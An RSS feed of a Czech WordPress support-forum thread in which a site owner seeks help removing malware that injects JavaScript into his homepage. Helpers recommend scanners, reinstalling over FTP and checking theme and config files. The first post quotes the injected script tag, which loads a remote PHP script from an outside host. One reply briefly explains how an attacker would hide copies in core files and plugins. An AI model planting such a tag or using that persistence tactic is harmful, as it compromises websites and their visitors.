<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="bbPress/1.1" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
		>
	<channel>
		<title>Fórum podpory WordPressu &#187; User Favorites: bigdrobek</title>
		<link>http://www.separatista.net/forum/profile.php?id=8267</link>
		<description>Pomůžeme, poradíme, vysvětlíme...</description>
		<language>cs-CZ</language>
		<pubDate>Sat, 25 May 2013 04:15:27 +0000</pubDate>
		<generator>http://bbpress.org/?v=1.1</generator>
				<atom:link href="http://www.separatista.net/forum/rss.php?profile=8267" rel="self" type="application/rss+xml" />

		<item>
			<title>poooool on "vir"</title>
			<link>http://www.separatista.net/forum/topic.php?id=1059#post-5720</link>
			<pubDate>Wed, 27 Jun 2012 23:39:30 +0000</pubDate>
			<dc:creator>poooool</dc:creator>
			<guid isPermaLink="false">5720@http://www.separatista.net/forum/</guid>
			<description><![CDATA[<p>Díky adminovi a Lukenzimu za informace.</p>
<p>Re admin<br />
ad 1) ve style.css jsem nenašel nic podezřelého kromě standardních stylů<br />
stránky hostujeme na cesky-hosting.cz<br />
Seznam pluginů:<br />
 - Another Wordpress Classifieds Plugin (AWPCP)<br />
 - BackWPup<br />
 - Countdown Widget<br />
 - Exploit Scanner<br />
 - Google Analytics for WordPress<br />
 - The Events Calendar<br />
 - TimThumb Vulnerability Scanner<br />
 - WP-Polls<br />
 - WP Security Scan</p>
<p>Šablona, která spolehlivě dá vir na stránky:<br />
Wedding Bells  Autor: Lauri Liimatta<br />
<a href="http://wordpress.org/extend/themes/wedding-bells?TB_iframe=true&#038;width=1024&#038;height=800" rel="nofollow">http://wordpress.org/extend/themes/wedding-bells?TB_iframe=true&#038;width=1024&#038;height=800</a></p>
<p>Obávám se, že nejlepší bude opravdu smazat vše přes FTP a nahrát znovu.<br />
Jelikož jsem WP začátečník, tak z toho mám trošku vítr, protože nevím co všechno je uloženo v souborech a co v databázích. A taky jak napojit čistou souborovou instalaci na existující DB. Zkusím zabrouzdat po netu.
</p>]]></description>
					</item>
		<item>
			<title>Lukenzi on "vir"</title>
			<link>http://www.separatista.net/forum/topic.php?id=1059#post-5502</link>
			<pubDate>Fri, 15 Jun 2012 22:08:24 +0000</pubDate>
			<dc:creator>Lukenzi</dc:creator>
			<guid isPermaLink="false">5502@http://www.separatista.net/forum/</guid>
			<description><![CDATA[<p>Naprostý souhlas,<br />
jen doplním, že opravením napadené šablony se problém nemusí vyřešit (a většinou nevyřeší). </p>
<p>Pokud bych měl vytvořit vir pro WP nemusím mít extra znalosti na to, aby mi došlo že šablona a pluginy budou první které uživatel zkontroluje. Proto bych samotný vir nakopíroval i do některých systémových souborů a do pluginů které by jste nepodezřívali a které má většina uživatelů stále aktivní (třeba akismet a další)...</p>
<p>Proto je nejjistější způsob jak se zbavit viru (nebo backdooru) ve WP kompletní smazání celého systému přes FTP a důsledná kontrola všech nově nahraných pluginů a šablon. Samotná aktualizace a přeinstalování systému z administrace vám nepomůže - nepřepíšou se všechny systémové soubory. Nemluvě o tom, že pak nemáte jistotu jestli se vám na FTP stahuje opravdu oficiální neinfikovaný WordPress ;)</p>
<p>Změna hesel je opravdu až tou poslední záležitostí...
</p>]]></description>
					</item>
		<item>
			<title>admin on "vir"</title>
			<link>http://www.separatista.net/forum/topic.php?id=1059#post-5491</link>
			<pubDate>Fri, 15 Jun 2012 09:23:41 +0000</pubDate>
			<dc:creator>admin</dc:creator>
			<guid isPermaLink="false">5491@http://www.separatista.net/forum/</guid>
			<description><![CDATA[<p>Je potřeba rozlišit, jak se virus na web dostal a co tam vlastně způsobil.</p>
<p>1) Vir způsobil načítání zmíněného JavaScriptu, které je závislé na použité šabloně. Proto bude problém v této šabloně. Našel jsem ještě jednu <a href="http://forum.wpde.org/allgemeines/101816-warnung-vor-aktuellem-hack.html">zmínku</a> o tomto viru v německém fóru (objevila se nedávno), kde upozorňují, že by zmíněný řádek měl být vložen na prvním řádku souboru style.css v adresáři používané šablony. Zkuste se tam podívat a odstranit ho.</p>
<p>2) Jak se to na web vůbec dostalo? Možností je několik:</p>
<p>a) Může za to uživatel - má zavirovaný počítač a ukládá si nešifrovaná hesla k FTP přímo do programu, který používá. Vir samozřejmě prozkoumá všechny FTP managery na FTP a případně nalezená hesla posílá autorům viru pro další použití. Zkuste pro jistotu prohlédnout počítač nějakým antivirem.</p>
<p>b) Může za to WordPress - velmi nepravděpodobné (ale také možné).</p>
<p>c) Může za to hosting - občas se to stává. Většinou by se ale objevilo více stížností, těžko říci. Jaký používáte hosting?</p>
<p>d) Může za to nějaký plugin, šablona nebo vlastní úprava - velmi časté. Jaké používáte pluginy? Zkuste nám sem dát seznam, třeba tam bude něco podezřelého, zejména Lukenzi v tom má dost přehled :-) I na německém fóru (viz odkaz výše) to řeší, uživatel s napadeným webem tam zveřejnil používané pluginy, třeba tam bude nějaký stejný, který by to mohl způsobovat?</p>
<p>Nepochopil jsem moc, jakou šablonu vlastně používáte? Píšete o <a href="http://wordpress.org/extend/themes/wedding-bells">Wedding Bells</a>, kde vyšla nedávno nová verze. Rozhodně doporučujeme aktualizovat, pro příště bych pak prováděl úpravy např. pomocí pluginu či odvozené šablony, aby byly (samozřejmě v rámci možností) nezávislé na budoucích aktualizacích. Pak ale píšete ještě o šabloně Green, takže nevím, kterou vlastně používáte?</p>
<blockquote><p>Zkusil jsem upgradovat všechny pluginy a upgradovat na čerstvou verzi Green - nepomohlo.</p></blockquote>
<p>Plugin <a href="http://wordpress.org/extend/plugins/wp-security-scan/">WP Security Scan</a> je sice dobrý na zjištění (a upozornění) "potenciálních" bezpečnostních problémů, ale s virem už nic nezmůže. Stejně tak nezjistí žádný bezpečnostní problém v používaných pluginech a šablonách. <a href="http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/">Timthumb Vulnerability Scanner</a> zase zkoumá pouze jeden z mnoha veřejně známých bezpečnostních problémů a patrně v tomto případě také moc nepomůže.</p>
<p>Všechna hesla je sice rozhodně dobré změnit, ale až po odstranění následku (viru) a příčiny (jak se tam dostal). Jinak je to podle mě vcelku zbytečné...
</p>]]></description>
					</item>
		<item>
			<title>poooool on "vir"</title>
			<link>http://www.separatista.net/forum/topic.php?id=1059#post-5488</link>
			<pubDate>Fri, 15 Jun 2012 00:05:50 +0000</pubDate>
			<dc:creator>poooool</dc:creator>
			<guid isPermaLink="false">5488@http://www.separatista.net/forum/</guid>
			<description><![CDATA[<p>Ahoj Bigdrobku,<br />
díky za pomoc.</p>
<p>ad 1, WP security scan ohlásil následující:<br />
You have the latest version of Wordpress.<br />
Your table prefix should not be wp_. Click here to change it. Read more on why should change the prefix here.<br />
Your WordPress version is successfully hidden.<br />
WordPress DB Errors turned off.<br />
WP ID META tag removed form WordPress core<br />
"admin" user exists.<br />
The file .htaccess does not exist in the wp-admin section. Read more why you should have a .htaccess file in the WP-admin area here.</p>
<p>zatím jsem nic neměnil, ale udělám, co píše že bych měl</p>
<p>ad 2) nic nenašel<br />
No instances of timthumb were found on your server.</p>
<p>ad 3) změnil jsem heslo ftp, wp adminu<br />
.htaccess chybí - viz hlášení z WP security scan - mrknu do instalačního balíčku WP<br />
wp-config nemá podle mě nic špatnýho - ani vpravo nebo dole "za rohem"</p>
<p>Dnes mně přišlo, že ta moje šablona má novou verzi. Jen se musím podívat, jestli moje úpravy šablony to přežijou.</p>
<p>Díky<br />
Pavel.
</p>]]></description>
					</item>
		<item>
			<title>Bigdrobek on "vir"</title>
			<link>http://www.separatista.net/forum/topic.php?id=1059#post-5473</link>
			<pubDate>Thu, 14 Jun 2012 07:09:45 +0000</pubDate>
			<dc:creator>Bigdrobek</dc:creator>
			<guid isPermaLink="false">5473@http://www.separatista.net/forum/</guid>
			<description><![CDATA[<p>Ahoj,</p>
<p>rád bych vyzkoušel jeden plugin, jestli timthumb vulnerability scan něco najde v tvé šabloně.</p>
<p>1) Zjisti kde je problém<br />
nahraj si plugin WP Security Scan a aktivuj automatický scan stránek (websitedefender). Počkej chvíli na první scan a hod sem info jestli to něco našlo.</p>
<p>2)Instaluj timthumb vulnerability scan a spust scan. Ten zjistí jakou máš verzi timthump v šabloně (možná kontroluje i jiné externí files). Dej vědět jestli to něco najde a pomocí tohoto pluginu aktualizuj pokud ti to něco najde.</p>
<p>Asi by to chtělo reinstalovat šablonu, změnit všechny hesla (ftp, db, wp admin), htaccess a wp-config nastavit práva na 444. I tímto nezjistíme jestli daný soubor malware zmizel. Zkoukni wp-config jestli tam není nějaký divný kod navíc, často úplně dole a úplně vpravo.</p>
<p>Bigdrobek
</p>]]></description>
					</item>
		<item>
			<title>poooool on "vir"</title>
			<link>http://www.separatista.net/forum/topic.php?id=1059#post-5472</link>
			<pubDate>Wed, 13 Jun 2012 23:42:29 +0000</pubDate>
			<dc:creator>poooool</dc:creator>
			<guid isPermaLink="false">5472@http://www.separatista.net/forum/</guid>
			<description><![CDATA[<p>Zdravím,<br />
pomohli byste mně prosím zbavit se malware nebo viru.<br />
Objevuje se javascript na úvodní stránce <a href="http://www.hodesovice.cz" rel="nofollow">http://www.hodesovice.cz</a>. Funguje i při vypnutých pluginech<br />
Při přechodu do administrace se javascript nespouští.<br />
Zkusil jsem upgradovat všechny pluginy a upgradovat na čerstvou verzi Green - nepomohlo.<br />
Nakonec jsem zjistil, že při použití základní šablony Twenty Eleven je vše v pořádku.<br />
Jinak jsem používal šablonu Wedding Bells, Autor: Lauri Liimatta</p>
<p>Homepage má upravený zdrojový kód - je přidaný první řádek:</p>
<p>---------------------------------<br />
&#60;script type="text/javascript" src="http://asjo.com.br/js/Check.php"&#62;&#60;/script&#62;</p>
<p>&#60;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&#62;<br />
&#60;html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="cs-CZ"&#62;<br />
...<br />
---------------------------------
</p>]]></description>
					</item>

	</channel>
</rss>
